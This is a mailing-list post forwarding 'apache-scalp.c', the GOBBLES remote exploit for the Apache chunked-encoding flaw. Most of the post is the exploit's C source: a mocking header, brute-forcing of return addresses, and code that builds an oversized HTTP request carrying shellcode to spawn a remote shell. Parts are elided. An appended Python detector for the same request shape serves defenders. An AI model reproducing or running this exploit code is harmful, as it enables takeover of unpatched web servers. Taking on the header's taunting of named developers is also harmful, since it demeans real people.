Just arrived in my mail! A new Apache root exploit. A follow-up to the ISS story.
What is Debian doing about this? I don't have the information.

Stef...

/*
 * apache-scalp.c
 * OPENBSD/X86 APACHE REMOTE EXPLOIT!!!!!!!
 *
 * ROBUST, RELIABLE, USER-FRIENDLY MOTHERFUCKING 0DAY WAREZ!
 *
 * BLING! BLING! --- BRUTE FORCE CAPABILITIES --- BLING! BLING!
 *
 * ". . . and Doug Sniff said it was a hole in Epic."
 *
 * ---
 * Disarm you with a smile
 * And leave you like they left me here
 * To wither in denial
 * The bitterness of one who's left alone
 * ---
 *
 * Remote OpenBSD/Apache exploit for the "chunking" vulnerability. Kudos to
 * the OpenBSD developers (Theo, DugSong, jnathan, [EMAIL PROTECTED], ...) and
 * their crappy memcpy implementation that makes this 32-bit impossibility
 * very easy to accomplish. This vulnerability was recently rediscovered by a slew
 * of researchers.
 *
 * The "experts" have already concurred that this bug...
 *   - Can not be exploited on 32-bit *nix variants
 *   - Is only exploitable on win32 platforms
 *   - Is only exploitable on certain 64-bit systems
 *
 * However, contrary to what ISS would have you believe, we have
 * successfully exploited this hole on the following operating systems:
 *
 *   Sun Solaris 6-8 (sparc/x86)
 *   FreeBSD 4.3-4.5 (x86)
 *   OpenBSD 2.6-3.1 (x86)
 *   Linux (GNU) 2.4 (x86)
 *
 * Don't get discouraged too quickly in your own research. It took us close
 * to two months to be able to exploit each of the above operating systems.
 * There is a peculiarity to be found for each operating system that makes the
 * exploitation possible.
 *
 * Don't email us asking for technical help or begging for warez. We are
 * busy working on many other wonderful things, including other remotely
 * exploitable holes in Apache. Perhaps The Great Pr0ix would like to inform
 * the community that those holes don't exist? We wonder who's paying her.
 *
 * This code is an early version from when we first began researching the
 * vulnerability. It should spawn a shell on any unpatched OpenBSD system
 * running the Apache webserver.
 *
 * We appreciate The Blue Boar's effort to allow us to post to his mailing
 * list once again. Because he finally allowed us to post, we now have this
 * very humble offering.
 *
 * This is a very serious vulnerability. After disclosing this exploit, we
 * hope to have gained immense fame and glory.
 *
 * Testbeds: synnergy.net, monkey.org, 9mm.com
 *
 * Abusing the right syscalls, any exploit against OpenBSD == root. Kernel
 * bugs are great.
 *
 * [#!GOBBLES QUOTES]
 *
 * --- you just know 28923034839303 admins out there running
 *     OpenBSD/Apache are going "ugh..not exploitable..ill do it after the
 *     weekend"
 * --- "Five years without a remote hole in the default install". default
 *     package = kernel. if theo knew that talkd was exploitable, he'd cry.
 * --- so funny how apache.org claims it's impossible to exploit this.
 * --- how many times were we told, "ANTISEC IS NOT FOR YOU" ?
 * --- I hope Theo doesn't kill himself
 * --- heh, this is a middle finger to all those open source, anti-"m$"
 *     idiots... slashdot hippies...
 * --- they rushed to release this exploit so they could update their ISS
 *     scanner to have a module for this vulnerability, but it doesn't even
 *     work... it's just looking for win32 apache versions
 * --- no one took us seriously when we mentioned this last year. we warned
 *     them that moderation == no pie.
 * --- now try it against synnergy :>
 * --- ANOTHER BUG BITE THE DUST... VROOOOM VRRRRRRROOOOOOOOOM
 *
 * xxxx this thing is a major exploit. do you really wanna publish it?
 * oooo i'm not afraid of whitehats
 * xxxx the blackhats will kill you for posting that exploit
 * oooo blackhats are a myth
 * oooo so i'm not worried
 * oooo i've never seen one
 * oooo i guess it's sort of like having god in your life
 * oooo i don't believe there's a god
 * oooo but if i sat down and met him
 * oooo i wouldn't walk away thinking
 * oooo "that was one hell of a special effect"
 * oooo so i suppose there very well could be a blackhat somewhere
 * oooo but i doubt it... i've seen whitehat-blackhats with their ethics
 *      and deep philosophy...
 *
 * [GOBBLES POSERS/WANNABES]
 *
 * --- [EMAIL PROTECTED] (none of us join here, but we've sniffed it)
 * --- [EMAIL PROTECTED] (low-level.net)
 *
 * GOBBLES Security
 * [EMAIL PROTECTED]
 * http://www.bugtraq.org
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#include <signal.h>

#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */
#define RET_ADDR_INC 512
#define MEMCPY_s1_OWADDR_DELTA -146

[ .... ]

#define NOP 0x41
#define PADDING_1 'A'
#define PADDING_2 'B'
#define PADDING_3 'C'

[ .... ]

};

int main(int argc, char *argv[])
{
    char *hostp, *portp;
    unsigned char buf[512], *expbuf, *p;
    int i, j, lport;
    int sock;
    int bruteforce, owned, progress;
    u_long retaddr;
    struct sockaddr_in sin, from;

    if(argc != 3) {
        printf("Usage: %s <target#|base address> <ip[:port]>\n", argv[0]);
        printf(" Using targets:\t./apache-scalp 3 127.0.0.1:8080\n");
        printf(" Using bruteforce:\t./apache-scalp 0x8f000 127.0.0.1:8080\n");
        printf("\n--- --- - Potential targets list - --- ----\n");
        printf("Target ID / Target specification\n");
        for(i = 0; i < sizeof(targets)/8; i++)
            printf("\t%d / %s\n", i, targets[i].type);
        return -1;
    }

    [ .... ]

    for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {
        /* skip invalid return addresses */
        i = retaddr & 0xff;
        if(i == 0x0a || i == 0x0d)
            retaddr++;
        else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
            continue;

        sock = socket(AF_INET, SOCK_STREAM, 0);
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(hostp);
        sin.sin_port = htons(atoi(portp));

        if(!progress)
            printf("\n[*] Connecting.. ");
        fflush(stdout);

        if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
            perror("connect()");
            exit(1);
        }

        if(!progress)
            printf("connected!\n");

        [ .... ]

        p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE)
            + ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) * REP_POPULATOR));

        PUT_STRING("GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n");

        for (i = 0; i < REP_SHELLCODE; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_3, PADDING_3);
            PUT_STRING(": ");
            PUT_BYTES(NOPCOUNT, NOP);
            memcpy(p, shellcode, sizeof(shellcode) - 1);
            p += sizeof(shellcode) - 1;
            PUT_STRING("\r\n");
        }

        for (i = 0; i < REP_POPULATOR; i++) {
            PUT_STRING("X-");
            PUT_BYTES(PADSIZE_1, PADDING_1);
            PUT_STRING(": ");
            for (j = 0; j < REP_RET_ADDR; j++) {
                *p++ = retaddr & 0xff;
                *p++ = (retaddr >> 8) & 0xff;
                *p++ = (retaddr >> 16) & 0xff;
                *p++ = (retaddr >> 24) & 0xff;
            }
            PUT_BYTES(REP_ZERO, 0);
            PUT_STRING("\r\n");
        }

        [ .... ]

        if(progress == 1) {
            memset(buf, 0, sizeof(buf));
            sprintf(buf, "\r[*] Currently using retaddr 0x%lx, length %u, localport %u",
                retaddr, (unsigned int)(p - expbuf), lport);
            memset(buf + strlen(buf), ' ', 74 - strlen(buf));
            puts(buf);
            if(bruteforce)
                putchar(';');
        }
        else
            putchar((rand()%2)? 'P': 'p');
        fflush(stdout);

        while (1) {
            fd_set fds;
            int n;

            [ .... ]

        if(!bruteforce) {
            fprintf(stderr, "Ooops.. hehehe!\n");
            return -1;
        }
    }

    return 0;
}

..........................................................
. Linux - Debian - php4 - Apache - MySQL - Managed IT services
. email: [EMAIL PROTECTED] - http://www.actionweb.fr
. Tel: (0)141 906 100 - Fax: (0)141 906 101
..........................................................
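The request the loop above assembles has a recognisable shape: a literal "Host: apache-scalp.c", many "X-" headers whose names are runs of one padding byte, values opening with a run of 0x41 filler, and values padded with zero bytes. The following detector is an added example for defenders, not part of the original post or of apache-scalp.c; the thresholds (8-byte name runs, 32-byte filler runs, 100 headers) and the constructed sample requests are assumptions.

```python
"""Added example (not part of the original post or of apache-scalp.c): flag HTTP
request heads shaped like the payload built by the exploit loop above."""
import re

# Header name of the form "X-" + a run of one padding byte ('A' or 'C' in the exploit).
PADDED_NAME = re.compile(rb"^X-([A-C])\1{7,}$")
# Value opening with a long run of 0x41, the byte the exploit uses as NOP filler.
FILLER_RUN = re.compile(rb"^A{32,}")
MAX_HEADERS = 100  # assumed upper bound for a legitimate request head


def inspect_request(raw: bytes) -> list[str]:
    """Return the exploit traits found in a raw request head (empty list = clean)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = [l.partition(b":") for l in head.split(b"\r\n")[1:] if b":" in l]
    reasons = []
    padded = filler = nul = 0
    for name, _, value in headers:
        value = value.strip(b" \t")
        if name.lower() == b"host" and value == b"apache-scalp.c":
            reasons.append("Host header is the literal apache-scalp.c marker")
        padded += bool(PADDED_NAME.match(name))
        filler += bool(FILLER_RUN.match(value))
        nul += b"\x00" in value  # exploit pads return-address headers with zero bytes
    if len(headers) > MAX_HEADERS:
        reasons.append(f"{len(headers)} headers in one request")
    if padded:
        reasons.append(f"{padded} header names are single-byte padding runs")
    if filler:
        reasons.append(f"{filler} header values open with a 0x41 filler run")
    if nul:
        reasons.append(f"{nul} header values contain NUL bytes")
    return reasons


# Constructed samples: an ordinary request, and an exploit-shaped head with inert
# stand-ins (0xCC bytes, a fake address) where the real code places its payload.
BENIGN = (b"GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n"
          b"User-Agent: curl/7.0\r\nAccept: */*\r\n\r\n")
SHAPED = b"GET / HTTP/1.1\r\nHost: apache-scalp.c\r\n"
SHAPED += (b"X-" + b"C" * 64 + b": " + b"A" * 200 + b"\xcc" * 16 + b"\r\n") * 4
SHAPED += (b"X-" + b"A" * 64 + b": " + b"\x78\x56\x34\x12" * 8 + b"\x00" * 4 + b"\r\n") * 4
SHAPED += b"\r\n"

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("exploit-shaped", SHAPED)):
        print(label, "->", inspect_request(req) or ["clean"])
```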